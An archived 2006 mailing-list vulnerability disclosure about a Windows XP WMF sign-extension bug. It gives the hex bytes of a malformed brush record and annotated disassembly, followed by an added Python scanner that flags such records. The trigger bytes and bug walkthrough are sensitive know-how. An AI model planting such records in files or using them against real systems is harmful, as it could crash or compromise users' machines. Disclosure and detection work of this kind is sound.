Message-ID: <118889282.20060807033429@gmail.com>
Date: Mon, 7 Aug 2006 03:34:29 +0400
From: cyanid-E <biz4rre@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: 0-day XP SP2 wmf exploit (some details)
Here are some details for wannabes :)
1. 'Bad' wmf record:
07 00 00 00 - length of record (in words)
FC 02 - type (CreateBrushIndirect)
08 00 00 00 00 00 00 80 - 'packed' (good old Win16 days) LOGBRUSH data:
  08 00 - 'packed' lbStyle (may be BS_DIBPATTERNPT [6] or BS_DIBPATTERN8X8 [8])
  00 00 00 00 - COLORREF (any)
  00 80 - 'packed' lbHatch (any, signed)
2. Sign extension bug:
_CommonEnumMetaFile:
......
    ; normalize 'packed' LOGBRUSH
    movzx eax, word ptr [ebx+6]    ; lbStyle (UINT32(UINT16))
    mov [ebp-0f8], eax
    mov eax, [ebx+8]               ; COLORREF (as is)
    mov [ebp-0f4], eax
    movsx eax, word ptr [ebx+0c]   ; <-- BUGBUG: lbHatch (UINT32(INT16))
    lea eax, [ebp-0f8]
    push eax
    call _CreateBrushIndirect
......
3. Memory access to fake 'pointer to packed DIB' (lbHatch) bug:
    cmp edi, 6                     ; BS_DIBPATTERNPT == lbStyle
    jz _go2crush
......
    cmp edi, 8                     ; BS_DIBPATTERN8X8 == lbStyle
    jz _go2crush
......
_go2crush:
    push esi
    push 1
    mov eax, [ebp+10]
    push eax
    push dword ptr [ebp+0c]        ; 1
    push dword ptr [ebp+18]        ; lpHatch (fake *packedDIB)
    call _pbmiConvertInfo
......
......
_pbmiConvertInfo:
......
    push ebx
    mov ebx, [ebp+8]               ; lpHatch (fake *packedDIB)
......
    mov eax, [ebx]                 ; <-- BUGBUG: crash or random (in first 0x7f00 bytes)
                                   ; memory access (see @ 0x3000 region)
good luck,
cyanid-E
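The record layout and the sign-extension step from the post, as an added example (not part of the original message): a parser for the 'packed' LOGBRUSH in a META_CREATEBRUSHINDIRECT record, the movzx-vs-movsx widening of lbHatch side by side, and a scanner that flags the records on which the vulnerable path treats lbHatch as a DIB pointer. Function names and the sample records are constructed for this example; the scanner assumes the 18-byte WMF header has already been skipped.

```python
import struct

META_CREATEBRUSHINDIRECT = 0x02FC   # record type from the post (FC 02)
BS_DIBPATTERNPT = 6                 # lbStyle values for which lbHatch is used as a pointer
BS_DIBPATTERN8X8 = 8
DIB_PATTERN_STYLES = (BS_DIBPATTERNPT, BS_DIBPATTERN8X8)

# Constructed sample: the 'bad' record from the post, as little-endian bytes.
BAD_RECORD = bytes.fromhex("07000000" "FC02" "0800" "00000000" "0080")


def parse_createbrushindirect(rec: bytes) -> dict:
    """Parse one META_CREATEBRUSHINDIRECT record: DWORD size (in words), WORD function,
    then the 16-bit 'packed' LOGBRUSH: WORD lbStyle, DWORD lbColor, WORD lbHatch."""
    size_words, func = struct.unpack_from("<IH", rec, 0)
    if func != META_CREATEBRUSHINDIRECT:
        raise ValueError("not a CreateBrushIndirect record: 0x%04x" % func)
    if size_words * 2 != len(rec) or len(rec) != 14:
        raise ValueError("bad record length")
    lb_style, lb_color, hatch_raw = struct.unpack_from("<HIH", rec, 6)
    return {"lbStyle": lb_style, "lbColor": lb_color, "lbHatch_raw": hatch_raw}


def widen_hatch(hatch_raw: int, sign_extend: bool) -> int:
    """Widen the 16-bit lbHatch to 32 bits. sign_extend=False mirrors movzx (what the
    other fields get); sign_extend=True mirrors the movsx in the post (the BUGBUG)."""
    if sign_extend and hatch_raw & 0x8000:
        return (hatch_raw - 0x10000) & 0xFFFFFFFF
    return hatch_raw


def find_dib_pattern_brushes(records: bytes) -> list:
    """Walk consecutive size-prefixed WMF records (assumption: header already skipped)
    and return (offset, parsed) for every CreateBrushIndirect record whose lbStyle is a
    DIB pattern style, i.e. the records on which lbHatch is treated as a packed-DIB pointer."""
    off, hits = 0, []
    while off + 6 <= len(records):
        size_words, func = struct.unpack_from("<IH", records, off)
        if size_words < 3:          # 3 words is the minimum record; anything less is malformed
            break
        length = size_words * 2
        if func == META_CREATEBRUSHINDIRECT and length == 14:
            parsed = parse_createbrushindirect(records[off:off + length])
            if parsed["lbStyle"] in DIB_PATTERN_STYLES:
                hits.append((off, parsed))
        off += length
    return hits
```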